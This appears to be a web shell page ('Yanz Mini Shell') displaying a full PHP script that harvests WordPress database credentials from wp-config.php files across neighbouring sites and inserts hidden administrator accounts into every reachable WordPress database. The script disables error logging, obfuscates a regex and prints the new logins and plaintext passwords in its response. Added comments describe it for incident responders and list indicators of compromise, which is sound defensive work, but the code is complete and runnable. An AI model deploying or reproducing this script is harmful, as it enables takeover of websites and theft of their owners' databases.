Yanz Mini Shell
[ Directory ] =>
/
home
bsuccess
public_html
blessedlandlordchallenge.com
<?php
// ANALYSIS NOTE (code below is unchanged; comments added for incident responders).
// Purpose, as shown by the code: locate WordPress installs reachable from the
// current document root, read each install's wp-config.php, log in to MySQL with
// the credentials found there, and insert an administrator-level account into
// every WordPress user table that login can see. The created credentials are
// echoed back in the HTTP response.
//
// Indicators visible in this listing that can be searched for:
//   - rows in a *users table with user_registered = '1979-01-01 00:00:00'
//   - user_pass stored as a bare 32-character hex MD5 instead of a prefixed
//     WordPress password hash
//   - user_login beginning with 'wp_update-' (the script treats such a row as
//     a sign the site was already processed)
//   - a user row with no user_email supplied by the INSERT, paired with
//     *usermeta rows granting 'administrator' and user_level 10
//   - response bodies containing the literal marker3456t3wtNg8nnG
//
// Error display, error logging and error reporting are switched off first, so
// failures in this script are not written to the PHP error log.
@ini_set('display_errors', 0); @ini_set('log_errors', 0); @error_reporting(0);
// gen_str($length): returns $length characters taken from a shuffled
// [0-9a-zA-Z] alphabet (str_shuffle, read from offset 1). Used below to produce
// the plaintext password of the inserted account.
function gen_str($length = 10) { return substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length / strlen($x)))), 1, $length); }
// create_users($docroot, &$already_added): returns NULL unless
// $docroot/wp-includes/version.php exists. Otherwise reads $docroot/wp-config.php
// and keeps the values of define('NAME', 'VALUE') entries whose NAME contains
// db_name, db_user, db_password or db_host (case-insensitive), then hands them to
// add_wp_user(). The regular expression is stored URL-encoded and decoded at run
// time. NOTE(review): presumably so the literal pattern does not appear in the
// file for signature-based scanners; confirm against other samples.
// Defensive takeaway: any PHP process that can read a site's wp-config.php holds
// that site's database credentials, so file ownership and per-site isolation
// decide how far one compromised site reaches.
function create_users($docroot, &$already_added) { if (!file_exists("$docroot/wp-includes/version.php")) return NULL; $cms_data = Array(); $cms_data['db_login'] = ""; $cms_data['db_passwd'] = ""; $cms_data['db_name'] = ""; $cms_data['db_host'] = ""; $content = @file_get_contents("$docroot/wp-config.php"); preg_match_all(rawurldecode('%2F%28define%5C%28%5Cs%2A%5C%27%29%28%5B%5E%5C%27%5D%2B%29%28%5C%27%2C%5Cs%2A%5C%27%29%28%5B%5E%5C%27%5D%2B%29%2F'), $content, $matches); if (is_array($matches)) { for ($i = 0; $i < count($matches[2]); $i++) { if (stristr($matches[2][$i], "db_name")) { $cms_data['db_name'] = $matches[4][$i]; } elseif (stristr($matches[2][$i], "db_user")) { $cms_data['db_login'] = $matches[4][$i]; } elseif (stristr($matches[2][$i], "db_password")) { $cms_data['db_passwd'] = $matches[4][$i]; } elseif (stristr($matches[2][$i], "db_host")) { $cms_data['db_host'] = $matches[4][$i]; } } } return add_wp_user($cms_data, $already_added); }
// add_wp_user($cms_data, &$already_added): returns a list of
// [siteurl, username, plaintext password] for each account it inserted.
// Steps, in the order the code runs them:
//   1. Splits db_host on ':' into host and port (port 3306 when none is given)
//      and connects with the harvested credentials.
//   2. Runs SHOW DATABASES and, in every database returned, SHOW TABLES. The
//      reach is therefore whatever that one MySQL account is allowed to see; an
//      account scoped to a single schema limits it to that schema.
//   3. For each table whose name contains "usermeta", treats the text before
//      that substring as the WordPress table prefix and reads 'siteurl' from
//      {prefix}options.
//   4. Builds the username from the first 8 characters of the site's domain
//      ('www.' removed, dots removed) plus the first two hex characters of an
//      MD5 over the domain and a fixed suffix, so it is reproducible per domain.
//   5. If {prefix}users already has a login LIKE 'wp_update-%' or equal to that
//      username, leaves the table loop for the current database. $already_added
//      (keyed by host, user, password, database and domain) skips sites that
//      were handled earlier in the same run.
//   6. Inserts the user row with user_pass = md5() of an 8-character gen_str()
//      value and the fixed user_registered date, then two {prefix}usermeta rows
//      for that user: {prefix}capabilities = administrator and
//      {prefix}user_level = 10.
// Cleanup after a hit: remove the inserted users and their usermeta rows, rotate
// the database password and WordPress salts, and trace how this file was written.
function add_wp_user($cms_data, &$already_added) { $db_name = $cms_data['db_name']; $db_user = $cms_data['db_login']; $db_pass = $cms_data['db_passwd']; $db_host = $cms_data['db_host']; $new_users = Array(); if (!empty($db_name)) { if (strpos($db_host, ":") !== FALSE) { $host_port = explode(":", $db_host); $host = $host_port[0]; $port = intval($host_port[1]); } else { $host = $db_host; $port = 3306; } if ($conn = mysqli_connect($host, $db_user, $db_pass, $db_name, $port)) { $result = mysqli_query($conn, "SHOW DATABASES;"); $dbs = Array(); while($row = mysqli_fetch_array($result, MYSQLI_NUM)) { $dbs[] = $row; } foreach ($dbs as $current_db) { $current_db = $current_db[0]; if (TRUE) { mysqli_select_db($conn, $current_db); $result2 = mysqli_query($conn, "SHOW 
TABLES;"); $tables = Array(); while($row = mysqli_fetch_array($result2, MYSQLI_NUM)) { $tables[] = $row; } foreach ($tables as $current_table) { $current_table = $current_table[0]; $prefix_pos = strpos($current_table, "usermeta"); if ($prefix_pos !== FALSE) { $prefix = substr($current_table, 0, $prefix_pos); $result3 = mysqli_query($conn, "SELECT option_value FROM " . $prefix . "options WHERE option_name='siteurl';"); $siteurl = mysqli_fetch_array($result3, MYSQLI_NUM); if (count($siteurl)) { $siteurl = $siteurl[0]; $domain = explode("/", $siteurl); $domain = $domain[2]; $domain = str_replace("www.", "", $domain); $username = str_replace(".", "", substr($domain, 0, 8)) . substr(md5($domain . "ebrsdebx8vcsw4"), 0, 2); $result_already = mysqli_query($conn, "SELECT * FROM " . $prefix . "users WHERE user_login LIKE 'wp_update-%' OR user_login='$username';"); if (mysqli_num_rows($result_already)) { break; } $config_key = $host . $db_user . $db_pass . $db_name . $domain; if (isset($already_added[$config_key])) { continue; } $already_added[$config_key] = TRUE; $pass_plain = gen_str(8); $pass = md5($pass_plain); mysqli_query($conn, "INSERT INTO $prefix" . "users (`user_login`, `user_pass`, `user_nicename`, `user_status`, `display_name`, `user_registered`) VALUES ('$username', '$pass', '$username', 0, '$username', '1979-01-01 00:00:00');"); mysqli_query($conn, "SET @created_user_id = LAST_INSERT_ID();"); mysqli_query($conn, "INSERT INTO $prefix" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $prefix . "capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');"); mysqli_query($conn, "INSERT INTO $prefix" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $prefix . 
"user_level', '10');"); mysqli_commit($conn); $new_users[] = Array($siteurl, $username, $pass_plain); } } } } } mysqli_close($conn); } } return $new_users; }
// list_dir($dir, $only_dirs): returns the full paths of the entries in $dir,
// skipping '.' and '..'; with $only_dirs TRUE only directories are kept. Returns
// an empty array when the directory cannot be opened. Trailing slashes are
// trimmed unless $dir is a single character.
function list_dir($dir, $only_dirs=TRUE) { $res = Array(); $dir = strlen($dir) == 1 ? $dir : rtrim($dir, '\\/'); $h = @opendir($dir); if ($h === FALSE) { return $res; } while (($f = readdir($h)) !== FALSE) { if ($f !== '.' and $f !== '..') { $tmp = "$dir/$f"; if ($only_dirs) { if (@is_dir($tmp)) { $res[] = $tmp; } } else{ $res[] = $tmp; } } } closedir($h); return $res; }
// Driver: starts at $_SERVER["DOCUMENT_ROOT"], walks upward with dirname() until
// the path stops changing, and for every ancestor collects its subdirectories
// and their subdirectories (two levels). Each candidate is passed to
// create_users(), so sibling sites under the same account or parent directory
// are covered as well as the current one. Restricting PHP to the site's own
// tree (separate OS users, open_basedir) makes these directory reads fail.
// The result is written to the response as serialize($res) between two copies
// of the marker string, then the script exits; the response body therefore
// carries the site URL, username and cleartext password of every account
// created in this run.
$base_docroots = Array(); $analysys_queue = Array(); $current_dir = $_SERVER["DOCUMENT_ROOT"]; $analysys_queue[] = $current_dir; while ($current_dir = @dirname($current_dir)) { if (count($analysys_queue) && $current_dir == $analysys_queue[count($analysys_queue) - 1]) { break; } $analysys_queue[] = $current_dir; } foreach ($analysys_queue as $current_dir) { if (!in_array($current_dir, $base_docroots)) { $level1 = list_dir($current_dir); foreach ($level1 as $level1_dir) { $base_docroots = array_merge($base_docroots, list_dir($level1_dir)); } $base_docroots = array_merge($base_docroots, $level1); } } $base_docroots = array_unique(array_merge($analysys_queue, $base_docroots)); $already_added = Array(); $res = Array(); foreach ($base_docroots as $docroot_cand) { $tmp = create_users($docroot_cand, $already_added); if ($tmp) { $res = array_merge($res, $tmp); } } echo "marker3456t3wtNg8nnG"; echo serialize($res); echo "marker3456t3wtNg8nnG"; exit();